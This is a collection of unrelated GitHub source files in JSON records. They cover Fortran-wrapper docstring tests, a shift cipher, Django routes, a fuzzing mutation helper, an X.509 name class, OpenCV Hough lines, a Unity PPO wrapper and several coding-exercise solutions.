Brief: Incomplete doc\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_param_return(self):\n circle = m_circle.t_circle()\n docstring = m_circle.output_1.__doc__\n ref_docstring = \"\"\"\n output = output_1()\n\n\n Defined at main.f90 lines 59-61\n\n\n Returns\n -------\n output : float, [out] this is 1\n\n Brief: subroutine output_1 outputs 1\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_function_return(self):\n circle = m_circle.t_circle()\n docstring = m_circle.function_2.__doc__\n ref_docstring = \"\"\"\n function_2 = function_2(input)\n\n\n Defined at main.f90 lines 69-71\n\n Parameters\n ----------\n input : str, [in] value\n\n Returns\n -------\n function_2 : int, return value\n\n Brief: this is a function\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_details(self):\n circle = m_circle.t_circle()\n docstring = m_circle.details_doc.__doc__\n ref_docstring = \"\"\"\n details_doc(self, radius)\n\n\n Defined at main.f90 lines 80-82\n\n Parameters\n ----------\n circle : T_Circle, [in,out] t_circle to initialize\n radius : float, [in] radius of the circle\n\n Brief: Initialize circle\n Details: Those are very informative details\n \"\"\"\n\n assert clean_str(ref_docstring) == 
clean_str(docstring)\n\n    @unittest.skip(\"Support for this feature is not planned for now\")\n    def test_doc_inside(self):\n        circle = m_circle.t_circle()\n        docstring = m_circle.doc_inside.__doc__\n        ref_docstring = \"\"\"\n        doc_inside(self, radius)\n\n\n        Defined at main.f90 lines 43-52\n\n        Parameters\n        ----------\n        circle : T_Circle, [in,out] t_circle to initialize\n        radius : float, [in] radius of the circle\n\n        Brief: Doc inside\n        \"\"\"\n\n        assert clean_str(ref_docstring) == clean_str(docstring)\n\n\nif __name__ == '__main__':\n\n    unittest.main()\n","repo_name":"jameskermode/f90wrap","sub_path":"examples/docstring/docstring_test.py","file_name":"docstring_test.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"72"} {"seq_id":"7525683188","text":"#Python3\np=input(\"Enter plain text: \")\nkey=int(input(\"Enter key: \"))#for taking integer input\nc=''\nfor i in range(len(p)):\n\ttemp=(ord(p[i])-97+key)%26\t#shift within the 26-letter lowercase alphabet\n\tc=c+chr(temp+97)\nprint(c)
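\n# (editor-added example, not in the original) with key=3 the plain text \"abc\" encrypts to \"def\"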
\n","repo_name":"jaspreetkaur96/-Network-Security","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"70113105512","text":"from credit_card import CreditCard, GoldenCreditCard, CorporateCreditCard\r\nfrom bank_info import BankInfo\r\nfrom bank_customer import BankCustomer, IndividualCustomer, CorporateCustomer, VIPCustomer, PersonalInfo\r\n\r\n\r\ndef main():\r\n    # Create instances with decorators\r\n    golden_credit_card = GoldenCreditCard(CreditCard)(\"John Doe\", \"1234567890123456\", 10000.0, 45, \"123\")\r\n    corporate_credit_card = CorporateCreditCard(CreditCard)(\"Jane Doe\", \"9876543210987654\", 20000.0, 60, \"456\")\r\n\r\n    individual_customer = IndividualCustomer(BankCustomer)(PersonalInfo(\"Alice Smith\", 28, \"456 Main St\"),\r\n                                                           BankInfo(\"Example Bank\", \"Alice Smith\", [\"1111222233334444\"],\r\n                                                                    {\"1111222233334444\": [\"2022-01-01: +$500\",\r\n                                                                                          \"2022-02-01: -$200\"]}))\r\n\r\n    corporate_customer = CorporateCustomer(BankCustomer)(PersonalInfo(\"Bob Johnson\", 35, \"789 Business St\"),\r\n                                                         BankInfo(\"Example Bank\", \"Bob Johnson\", [\"5555666677778888\"], {\r\n                                                             \"5555666677778888\": [\"2022-01-01: +$1000\",\r\n                                                                                  \"2022-02-01: -$300\"]}))\r\n\r\n    vip_customer = VIPCustomer(BankCustomer)(PersonalInfo(\"Eve Williams\", 40, \"123 VIP Lane\"),\r\n                                             BankInfo(\"Example Bank\", \"Eve Williams\", [\"9999888877776666\"], {\r\n                                                 \"9999888877776666\": [\"2022-01-01: +$2000\", \"2022-02-01: -$500\"]}))\r\n\r\n    # Test the decorated objects\r\n    print(\"Golden Credit Card Details:\")\r\n    print(golden_credit_card.give_details())\r\n\r\n    print(\"\\nCorporate Credit Card Details:\")\r\n    print(corporate_credit_card.give_details())\r\n\r\n    print(\"\\nIndividual Customer Details:\")\r\n    print(individual_customer.give_details())\r\n\r\n    print(\"\\nCorporate Customer Details:\")\r\n    print(corporate_customer.give_details())\r\n\r\n    print(\"\\nVIP Customer Details:\")\r\n    print(vip_customer.give_details())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"TwoUfo/Patern_FEP21","sub_path":"Тисовський Олег/Patern-Lab-5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"70471236392","text":"from django.conf.urls import url\n\nfrom user import views\n\nurlpatterns = [\n    url(r'^register/', views.register, name='register'),\n    url(r'^login/', views.login, name='login'),\n    url(r'^logout/', views.logout, name='logout'),\n    # url(r'^userper/', views.userper, name='userper')\n    # hand-rolled authentication (manual versions kept below for reference)\n    # url(r'^my_login/', views.my_login, name='my_login'),\n    # url(r'^my_register/', views.my_register, name='my_register'),\n    # url(r'^my_logout/', views.my_logout, name='my_logout'),\n    ]","repo_name":"ZhouForrest/djangoProjects","sub_path":"day01/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"14727324108","text":"# https://www.acmicpc.net/problem/10828\n\nimport sys\nanswer = []\n\nn = int(sys.stdin.readline())\n\nfor i in range(0,n):\n    word = str(sys.stdin.readline().strip())\n    if word == \"pop\":\n        if not answer:\n            print(-1) # stack is empty\n        else:\n            print(answer.pop())\n    elif word == \"size\":\n        print(len(answer))\n    elif word == \"empty\":\n        if not answer:\n            print(1) # stack is empty\n        else:\n            print(0)\n    elif word == \"top\":\n        if not answer:\n            print(-1) # stack is empty\n        else :\n            print(answer[-1])\n    elif word.startswith('push'):\n        _, item = word.split()\n        answer.append(int(item))\n    else:\n        pass\n\n\n\n# A more concise solution\nimport sys\ninput=sys.stdin.readline\n\ns = []\nn = int(input().rstrip())\n\nfor _ in range(n):\n    op = list(map(str, input().split()))\n    if op[0] == 'push':\n        s.append(int(op[1]))\n    elif op[0] == 'pop':\n        print(s[-1] if len(s) else -1)\n        s = s[:-1]\n    elif op[0] == 'size':\n        print(len(s))\n    elif op[0] == 'empty':\n        print(0 if len(s) else 1)\n    elif op[0] == 'top':\n        print(s[-1] if len(s) else -1)\n","repo_name":"sunnyineverywhere/algorithm","sub_path":"yhjune/Data Structre (자료구조)/B10828.py","file_name":"B10828.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"22055037433","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module contains the base classes used\nwhen defining mutation strategies for pfp\n\"\"\"\n\n\nimport glob\nimport os\nimport six\n\n\nget_strategy = None\nStratGroup = None\nFieldStrat = None\n\n\ndef init():\n    global get_strategy\n    global StratGroup\n    global FieldStrat\n    import pfp.fuzz.strats\n\n    get_strategy = pfp.fuzz.strats.get_strategy\n    StratGroup = pfp.fuzz.strats.StratGroup\n    FieldStrat = pfp.fuzz.strats.FieldStrat\n\n    # load all of the built-in strategies\n    for strat_file in glob.glob(os.path.join(os.path.dirname(__file__), \"*.py\")):\n        filename = os.path.basename(strat_file)\n        if filename in [\"__init__.py\", \"base.py\"]:\n            continue\n        mod_name = filename.replace(\".py\", \"\").replace(\".pyc\", \"\")\n        __import__(\"pfp.fuzz.\" + mod_name)\n\n\ndef mutate(field, strat_name_or_cls, num=100, at_once=1, yield_changed=False):\n    \"\"\"Mutate the provided field (probably a Dom or struct instance) using the\n    strategy specified with ``strat_name_or_class``, yielding ``num`` mutations\n    that affect up to ``at_once`` fields at once.\n\n    This function will yield back the field after each mutation, optionally\n    also yielding a ``set`` of fields that were mutated in that iteration (if ``yield_changed`` is\n    ``True``). 
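A typical call looks like ``for dom, changed in mutate(dom, MyStrat, num=10, yield_changed=True): ...`` (illustrative only; ``MyStrat`` stands in for a real strategy name or class). 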
It should also be noted that the yielded set of changed fields *can*\n be modified and is no longer needed by the mutate() function.\n\n :param pfp.fields.Field field: The field to mutate (can be anything, not just Dom/Structs)\n :param strat_name_or_class: Can be the name of a strategy, or the actual strategy class (not an instance)\n :param int num: The number of mutations to yield\n :param int at_once: The number of fields to mutate at once\n :param bool yield_changed: Yield a list of fields changed along with the mutated dom\n :returns: generator\n \"\"\"\n import pfp.fuzz.rand as rand\n\n init()\n\n strat = get_strategy(strat_name_or_cls)\n to_mutate = strat.which(field)\n\n with_strats = []\n for to_mutate_field in to_mutate:\n field_strat = strat.get_field_strat(to_mutate_field)\n if field_strat is not None:\n with_strats.append((to_mutate_field, field_strat))\n\n # we don't need these ones anymore\n del to_mutate\n\n # save the current value of all subfields without\n # triggering events\n field._pfp__snapshot(recurse=True)\n\n count = 0\n for x in six.moves.range(num):\n\n chosen_fields = set()\n idx_pool = set([x for x in six.moves.xrange(len(with_strats))])\n\n # modify `at_once` number of fields OR len(with_strats) number of fields,\n # whichever is lower\n for at_onces in six.moves.xrange(min(len(with_strats), at_once)):\n # we'll never pull the same idx from idx_pool more than once\n # since we're removing the idx after choosing it\n rand_idx = rand.sample(idx_pool, 1)[0]\n idx_pool.remove(rand_idx)\n\n rand_field,field_strat = with_strats[rand_idx]\n chosen_fields.add(rand_field)\n\n field_strat.mutate(rand_field)\n \n if yield_changed:\n yield field, chosen_fields\n else:\n # yield back the original field\n yield field\n\n # restore the saved value of all subfields without\n # triggering events\n field._pfp__restore_snapshot(recurse=True)\n","repo_name":"Leonardo-DiCaprio/fileFuzz","sub_path":"cmp/utils/pfp/fuzz/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"6223900729","text":"from collections import defaultdict\nfrom typing import List\n\nfrom cryptography import x509\nfrom cryptography.hazmat._oid import NameOID\n\n\nfrom pydantic import Field, ConfigDict\n\nfrom pki_tools.types.crypto_parser import CryptoParser\n\n\nclass Name(CryptoParser):\n \"\"\"\n Name type describes certificate subject or issuer.\n The attributes are following the\n [RFC5280#Section-4.1.2.4](https://datatracker.ietf.org/doc/html/rfc5280#section-4.1.2.4)\n\n Note that every attribute is a list of string in order to support\n multivalued RDNs.\n\n Attributes:\n c -- Country Name (2.5.4.6)\n o -- Organization Name (2.5.4.10)\n ou -- Organizational Unit Name (2.5.4.11)\n dnq -- Distinguished Name Qualifier (2.5.4.46)\n s -- State Or Province Name (2.5.4.8)\n cn -- Common Name (2.5.4.3)\n serial -- Serial Number (2.5.4.5)\n ln -- Locality Name (2.5.4.7)\n t -- Title (2.5.4.12)\n sn -- Surname (2.5.4.4)\n gn -- Given Name (2.5.4.42)\n i -- Initials (2.5.4.43)\n p -- Pseudonym (2.5.4.65)\n gq -- Generation Qualifier (2.5.4.44)\n dc -- Domain Component (0.9.2342.19200300.100.1.25)\n \"\"\"\n\n model_config = ConfigDict(populate_by_name=True)\n\n c: List[str] = Field(alias=NameOID.COUNTRY_NAME.dotted_string, default=[])\n o: List[str] = Field(\n alias=NameOID.ORGANIZATION_NAME.dotted_string, default=[]\n )\n ou: List[str] = Field(\n 
alias=NameOID.ORGANIZATIONAL_UNIT_NAME.dotted_string, default=[]\n )\n dnq: List[str] = Field(\n alias=NameOID.DN_QUALIFIER.dotted_string, default=[]\n )\n s: List[str] = Field(\n alias=NameOID.STATE_OR_PROVINCE_NAME.dotted_string, default=[]\n )\n cn: List[str] = Field(alias=NameOID.COMMON_NAME.dotted_string, default=[])\n serial: List[str] = Field(\n alias=NameOID.SERIAL_NUMBER.dotted_string, default=[]\n )\n\n ln: List[str] = Field(\n alias=NameOID.LOCALITY_NAME.dotted_string, default=[]\n )\n t: List[str] = Field(alias=NameOID.TITLE.dotted_string, default=[])\n sn: List[str] = Field(alias=NameOID.SURNAME.dotted_string, default=[])\n gn: List[str] = Field(alias=NameOID.GIVEN_NAME.dotted_string, default=[])\n i: List[str] = Field(alias=NameOID.INITIALS.dotted_string, default=[])\n p: List[str] = Field(alias=NameOID.PSEUDONYM.dotted_string, default=[])\n gq: List[str] = Field(\n alias=NameOID.GENERATION_QUALIFIER.dotted_string, default=[]\n )\n dc: List[str] = Field(\n alias=NameOID.DOMAIN_COMPONENT.dotted_string, default=[]\n )\n\n @classmethod\n def from_cryptography(cls, name: x509.Name):\n subject = defaultdict(set)\n for attribute in name:\n for att in name.get_attributes_for_oid(attribute.oid):\n subject[att.oid.dotted_string].add(att.value)\n return cls(**subject)\n\n def to_crypto_name(self) -> x509.Name:\n name_list = []\n for attr_name in vars(self):\n vals = getattr(self, attr_name)\n if not vals:\n continue\n\n oid = Name.model_fields[attr_name].alias\n for val in vals:\n name_list.append(\n x509.NameAttribute(x509.ObjectIdentifier(oid), val)\n )\n\n return x509.Name(name_list)\n\n def _string_dict(self):\n ret = {}\n for a in self.model_dump():\n for val in getattr(self, a):\n ret[a.upper()] = val\n return ret\n\n def __str__(self):\n name_list = []\n for k, v in self._string_dict().items():\n name_list.append(f\"{k}: {v}\")\n return \", \".join(name_list)\n","repo_name":"fulder/pki-tools","sub_path":"pki_tools/types/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70183115112","text":"\"\"\"\n@file hough_lines.py\n@brief This program demonstrates line finding with the Hough transform\n\"\"\"\nimport sys\nimport math\nimport cv2 as cv\nimport numpy as np\n\n\ndef main(argv):\n ## [load]\n default_file = 'sudoku.png'\n filename = argv[0] if len(argv) > 0 else default_file\n\n # Loads an image\n src = cv.imread(cv.samples.findFile(filename), cv.IMREAD_GRAYSCALE)\n\n # Check if image is loaded fine\n if src is None:\n print ('Error opening image!')\n print ('Usage: hough_lines.py [image_name -- default ' + default_file + '] \\n')\n return -1\n ## [load]\n\n ## [edge_detection]\n # Edge detection\n dst = cv.Canny(src, 50, 200, None, 3)\n ## [edge_detection]\n\n # Copy edges to the images that will display the results in BGR\n cdst = cv.cvtColor(dst, cv.COLOR_GRAY2BGR)\n cdstP = np.copy(cdst)\n\n ## [hough_lines]\n # Standard Hough Line Transform\n lines = cv.HoughLines(dst, 1, np.pi / 180, 150, None, 0, 0)\n ## [hough_lines]\n ## [draw_lines]\n # Draw the lines\n if lines is not None:\n for i in range(0, len(lines)):\n rho = lines[i][0][0]\n theta = lines[i][0][1]\n a = math.cos(theta)\n b = math.sin(theta)\n x0 = a * rho\n y0 = b * rho\n pt1 = (int(x0 + 1000*(-b)), int(y0 + 1000*(a)))\n pt2 = (int(x0 - 1000*(-b)), int(y0 - 1000*(a)))\n\n cv.line(cdst, pt1, pt2, (0,0,255), 3, cv.LINE_AA)\n ## [draw_lines]\n\n ## [hough_lines_p]\n # Probabilistic 
Line Transform\n    linesP = cv.HoughLinesP(dst, 1, np.pi / 180, 50, None, 50, 10)\n    ## [hough_lines_p]\n    ## [draw_lines_p]\n    # Draw the lines\n    if linesP is not None:\n        for i in range(0, len(linesP)):\n            l = linesP[i][0]\n            cv.line(cdstP, (l[0], l[1]), (l[2], l[3]), (0,0,255), 3, cv.LINE_AA)\n    ## [draw_lines_p]\n    ## [imshow]\n    # Show results\n    cv.imshow(\"Source\", src)\n    cv.imshow(\"Detected Lines (in red) - Standard Hough Line Transform\", cdst)\n    cv.imshow(\"Detected Lines (in red) - Probabilistic Line Transform\", cdstP)\n    ## [imshow]\n    ## [exit]\n    # Wait and Exit\n    cv.waitKey()\n    return 0\n    ## [exit]\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","repo_name":"joachimBurket/esp32-opencv","sub_path":"samples/python/tutorial_code/ImgTrans/HoughLine/hough_lines.py","file_name":"hough_lines.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"72"} {"seq_id":"21712164747","text":"from matplotlib import pyplot as plt\ndef DDA(x0,y0,x1,y1):\n    dx=abs(x1-x0)\n    dy=abs(y1-y0)\n    if dx==0:\n        m=float('inf')  # vertical line: avoid dividing by zero\n    else:\n        m=dy/dx\n    steps=max(dx,dy)\n    xlist=[]\n    ylist=[]\n    print(steps)\n    for i in range(steps):\n        if m<1:\n            x0=x0+1\n            y0=y0+m\n        elif m==1:\n            x0=x0+1\n            y0=y0+1\n        elif m>1:\n            x0=x0+1/m\n            y0=y0+1\n\n        x0=round(x0,2)\n        y0=round(y0,2)\n        print(\"x=\",x0, end=\", \")\n        print(\"y=\",y0, end=\"\\n\")\n\n        xlist.append(x0)\n        ylist.append(y0)\n    plt.plot(xlist,ylist,linestyle=\"--\",marker=\"+\")\n    plt.show()\n\n#main()\nprint(\"Insert Starting Coordinate\")\nx0=int(input())\ny0=int(input())\nprint(\"Insert End Coordinate\")\nx1=int(input())\ny1=int(input())\nDDA(x0,y0,x1,y1)\n","repo_name":"rakib-utsho/Computer-Graphics","sub_path":"myAlexa/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"6327102576","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport numpy as np\nimport sys\n\n\n# In[ ]:\n\ncombos = {(\"rock\", \"paper\"): \"You Won!\",\n          (\"rock\", \"scissors\"): \"You Lost!\",\n          (\"paper\", \"rock\"): \"You Lost!\",\n          (\"paper\", \"scissors\"): \"You Won!\",\n          (\"scissors\", \"rock\"): \"You Won!\",\n          (\"scissors\", \"paper\"): \"You Lost!\"}\n\noptions = [\"rock\",\"paper\",\"scissors\"]\n\ndef play(your_choice, combos, options):\n\n    your_choice = your_choice.lower()\n    comp_choice = options[np.random.randint(0,3)]\n    print(f\"The computer chose: {comp_choice}\")\n\n    if your_choice == comp_choice:\n        print(\"It's A Tie!\")\n    else:\n        print(combos[(comp_choice,your_choice)])\n\n\n# In[ ]:\n\n\nprint(\"Rock, Paper, Scissors... \\n\")\n\nwhile True:\n    player_choice = input(\"Input your choice: \")\n    play(player_choice,combos,options)\n    print(\" \")\n    quit = input(\"Play again? 
y/n: \").lower()\n if quit == \"n\":\n sys.exit()\n print(\"\")\n","repo_name":"mont-grunthal/Teaching_game","sub_path":"rock_dict.py","file_name":"rock_dict.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9001941556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 5 14:12:18 2020\n\n@author: ramyagurunathan\n\nRead-Shockley Energy versus the Thermal Boundary Resistance\n\"\"\"\nfrom ArrayScattering import ArrayScattering as AS\nimport numpy as np\nfrom math import pi as pi\nimport matplotlib.pyplot as plt\nimport ThermalTransport as TT\n\n'''\nMaterials Parameters\n'''\ninput_dict = {'avg_vs': 6084,\n 'atmV': [2E-29],\n 'N': 2,\n 'bulkmod' : 97.83E9,\n 'nu' : 0.29,\n 'gruneisen' : 1,\n }\n\ntwist = AS(**input_dict, geom = 'twist', theta = 5, ax = {'n': 1, 'm' : 2}, d_GS = 350E-9, bvK = True)\n\ndef core_energy(Ec, b, theta):\n theta = theta * (pi / 180)\n return 2 * np.sin(2 * theta) * (Ec / b)\n\ndef strain_energy(Es, b, theta):\n theta = theta * (pi / 180)\n return (Es / b) * np.log(np.sin(2 * theta))\n\n\ncore = []\nstrain = []\ntot = []\n\nEc = 1\nEs = 1\nfor t in [1, 2, 3, 5, 7, 8, 9, 10, 15]:\n c = core_energy(Ec, twist.b, t)\n s = strain_energy(Es, twist.b, t)\n core.append(c)\n strain.append(s)\n tot.append(c + s)\n\n\ntwist1 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist1spectral_updatetau.npy')\ntwist2 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist2spectral_updatetau.npy')\ntwist3 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist3spectral_updatetau.npy')\ntwist5 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist5spectral_updatetau.npy')\ntwist7 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist7spectral_updatetau.npy')\ntwist8 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist8spectral_updatetau.npy')\ntwist10 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist10spectral_updatetau.npy')\ntwist15 = np.load('/Users/ramyagurunathan/Documents/PhDProjects/BoundaryScattering/datafiles/fall2020_2/twist15spectral_updatetau.npy')\n\ntbc1 = []\ntbc2 = []\ntbc3 = []\ntbc5 = []\ntbc7 = []\ntbc8 = []\ntbc10 = []\ntbc15 = []\nfor T in [100, 150,200,250,300, 500]:\n transport1 = TT.transport_coeffs_from_tau(twist, twist1[0] / twist.vs, twist1[1], T)\n transport2 = TT.transport_coeffs_from_tau(twist, twist2[0] / twist.vs, twist2[1], T)\n transport3 = TT.transport_coeffs_from_tau(twist, twist3[0] / twist.vs, twist3[1], T)\n transport5 = TT.transport_coeffs_from_tau(twist, twist5[0] / twist.vs, twist5[1], T)\n transport7 = TT.transport_coeffs_from_tau(twist, twist7[0] / twist.vs, twist7[1], T)\n transport8 = TT.transport_coeffs_from_tau(twist, twist8[0] / twist.vs, twist8[1], T)\n transport10 = TT.transport_coeffs_from_tau(twist, twist10[0] / twist.vs, twist10[1], T)\n transport15 = TT.transport_coeffs_from_tau(twist, twist15[0] / twist.vs, twist15[1], T)\n tbc1.append((1 / transport1['TBC']) * 1E9)\n tbc2.append((1 / transport2['TBC']) * 1E9)\n tbc3.append((1 / transport3['TBC']) * 1E9)\n tbc5.append((1 / transport5['TBC']) * 1E9)\n tbc7.append((1 / transport7['TBC']) * 1E9)\n tbc8.append((1 / 
transport8['TBC']) * 1E9)\n    tbc10.append((1 / transport10['TBC']) * 1E9)\n    tbc15.append((1 / transport15['TBC']) * 1E9)\n    \n'''\nPlot \n'''\n\nfig, ax = plt.subplots()\nax2 = ax.twinx()\n\n\n","repo_name":"RamyaGuru/BoundaryScattering","sub_path":"test_scripts/RSenergy_tbr.py","file_name":"RSenergy_tbr.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"12687416403","text":"from mlagents_envs.environment import UnityEnvironment, DecisionSteps\nimport numpy as np\nfrom ppo import ppo\nimport sys\n\nclass UnityEnvWrapper:\n    def __init__(self, filename=None):\n        self.env = UnityEnvironment(file_name=filename, seed=1, worker_id=0, side_channels=[])\n        self.env.reset()\n        self.behavior_names = [b for b in self.env.behavior_specs]\n        self.behavior_specs = [self.env.behavior_specs[b] for b in self.behavior_names]\n        self.behavior_name = self.behavior_names[0]\n        self.behavior_spec = self.behavior_specs[0]\n        self.action_shape = (self.behavior_spec.action_shape,)\n        self.state_shape = [s[0] for s in self.behavior_spec.observation_shapes]\n        rays = 101\n        steps = 5\n        self.state_shape[0] -= rays*(steps-1)\n        self.state_shape = (sum(self.state_shape),)\n\n    def step(self,actions=None):\n        if(actions is not None):\n            self.env.set_actions(self.behavior_name, actions)\n        self.env.step()\n\n        ds,ts = self.env.get_steps(self.behavior_name)\n        actors = {}\n\n        print(\"DS:\")\n        print(ds.agent_id)\n        print(ds.reward)\n\n        print(\"TS:\")\n        print(ts.agent_id)\n        print(ts.reward)\n        rays = 101\n        steps = 5\n        for i,ID in enumerate(ds.agent_id):\n            raycast = ds.obs[0][i][rays*(steps-1):]\n            positions = ds.obs[1][i]\n            state = np.concatenate((raycast,positions)).flatten()\n            actors[ID] = {'obs':state,'reward':ds.reward[i],'done':False}\n\n        for i,ID in enumerate(ts.agent_id):\n            raycast = ts.obs[0][i][rays*(steps-1):]\n            positions = ts.obs[1][i]\n            state = np.concatenate((raycast,positions)).flatten()\n            actors[ID] = {'obs':state,'reward':ts.reward[i],'done':True}\n\n        return actors\n\n    def reset(self):\n        self.env.reset()\n\nif __name__ == \"__main__\":\n    resume = False\n    if 'resume' in sys.argv:\n        resume = True\n    env_fn = lambda : UnityEnvWrapper(filename=\"./20robots/Fruit Picker.exe\")\n    ppo(env_fn, path='./models/', resume=resume)\n","repo_name":"shervlad/unity_training","sub_path":"run_unity_ppo.py","file_name":"run_unity_ppo.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"41236690555","text":"# cothread.py\n#\n# A thread object that runs a coroutine inside it. Messages are sent\n# to it through a Queue object
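\n#\n# (editor-added sketch, illustrative) t = threaded(consumer()); t.send(item); t.close()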
\n\nfrom threading import Thread\nfrom queue import Queue\nimport threading\nfrom coroutine import *\n\n@coroutine\ndef threaded(target):\n    messages = Queue() \n    def run_target(): \n        while True: \n            item = messages.get()\n            if item is GeneratorExit:\n                target.close()\n                return \n            else: \n                target.send(item)\n    Thread(target=run_target).start()\n    try:\n        while True:\n            item = (yield) \n            messages.put(item)\n    except GeneratorExit:\n        messages.put(GeneratorExit)\n\n# Usage example\n\nif __name__ == '__main__':\n    import xml.sax\n    from cosax import EventHandler\n    from buses import * \n    mi_manejador = EventHandler(buses_to_dicts(threaded(filter_on_field(\"route\",\"22\",\n                                filter_on_field(\"direction\",\"North Bound\",\n                                bus_locations()))))) \n    xml.sax.parse(\"allroutes.xml\",mi_manejador )\n    \n","repo_name":"arbarr20/python-notes","sub_path":"generadores parte 2/cothread.py","file_name":"cothread.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"25791872634","text":"# word Break 2\n# leetcode 140\n\n\nclass Solution1(object):\n\tdef wordBreak(self, s, wordDict):\n\t\t\"\"\"\n\t\t:type s: str\n\t\t:type wordDict: List[str]\n\t\t:rtype: List[str]\n\t\t\"\"\"\n\t\t# backtrack\n\t\t# Time: O(n ^ n)\n\t\t# space: O(n * n * n)\n\n\t\tdef backtrack(s, wordDict, start):\n\t\t\tres = []\n\t\t\t\n\t\t\tif start == len(s):\n\t\t\t\tres.append(\"\")\n\t\t\t\treturn res\n\t\t\t\n\t\t\tfor i in range(start, len(s)):\n\t\t\t\tif s[start: i + 1] in wordDict:\n\t\t\t\t\tlists = backtrack(s, wordDict, i + 1)\n\t\t\t\t\tfor l in lists:\n\t\t\t\t\t\tres.append(s[start: i + 1] + (\"\" if l == \"\" else \" \") + l)\n\t\t\treturn res\n\t\t\t\t\t\t\n\t\treturn backtrack(s, set(wordDict), 0)\n\n\n\nclass Solution2(object):\n\tdef wordBreak(self, s, wordDict):\n\t\t\"\"\"\n\t\t:type s: str\n\t\t:type wordDict: List[str]\n\t\t:rtype: List[str]\n\t\t\"\"\"\n\t\t# backtrack with memo\n\t\t# Time: O(n ^ 3)\n\t\t# space: O(n ^ 3)\n\t\t\n\t\tdef backtrack_memo(s, wordDict, start, memo):\n\t\t\tif start in memo:\n\t\t\t\treturn memo[start]\n\t\t\tres = []\n\t\t\tif start == len(s):\n\t\t\t\tres.append(\"\")\n\t\t\t\treturn res\n\t\t\tfor i in range(start, len(s)):\n\t\t\t\tif s[start: i + 1] in wordDict:\n\t\t\t\t\tlists = backtrack_memo(s, wordDict, i + 1, memo)\n\t\t\t\t\tfor l in lists:\n\t\t\t\t\t\tres.append(s[start: i + 1] + (\"\" if l == \"\" else \" \") + l)\n\t\t\tmemo[start] = res\n\t\t\treturn res\n\t\t\n\t\treturn backtrack_memo(s, set(wordDict), 0, {})\n\n\n\nclass Solution3(object):\n\tdef wordBreak(self, s, wordDict):\n\t\t\"\"\"\n\t\t:type s: str\n\t\t:type wordDict: List[str]\n\t\t:rtype: List[str]\n\t\t\"\"\"\t\t\n\t\t# DP\n\t\t# Time: O(n ^ 3)\n\t\t# Space: O(n ^ 3)\n\t\t# MLE\n\n\t\tdp = {i:[] for i in range(len(s) + 1)}\n\t\tdp[0].append(\"\")\n\t\twordDictSet = set(wordDict)\n\t\t\n\t\tfor i in range(1, len(s) + 1):\n\t\t\tlists = []\n\t\t\tfor j in range(i):\n\t\t\t\tif len(dp[j]) > 0 and s[j: i] in wordDictSet:\n\t\t\t\t\tfor l in dp[j]:\n\t\t\t\t\t\tlists.append(l + (\"\" if l == \"\" else \" \") + s[j: i])\n\t\t\tdp[i] = lists\n\t\treturn dp[len(s)]
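\n\n# (editor-added example) Solution1().wordBreak(\"catsand\", [\"cat\", \"cats\", \"and\", \"sand\"]) -> [\"cat sand\", \"cats and\"]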
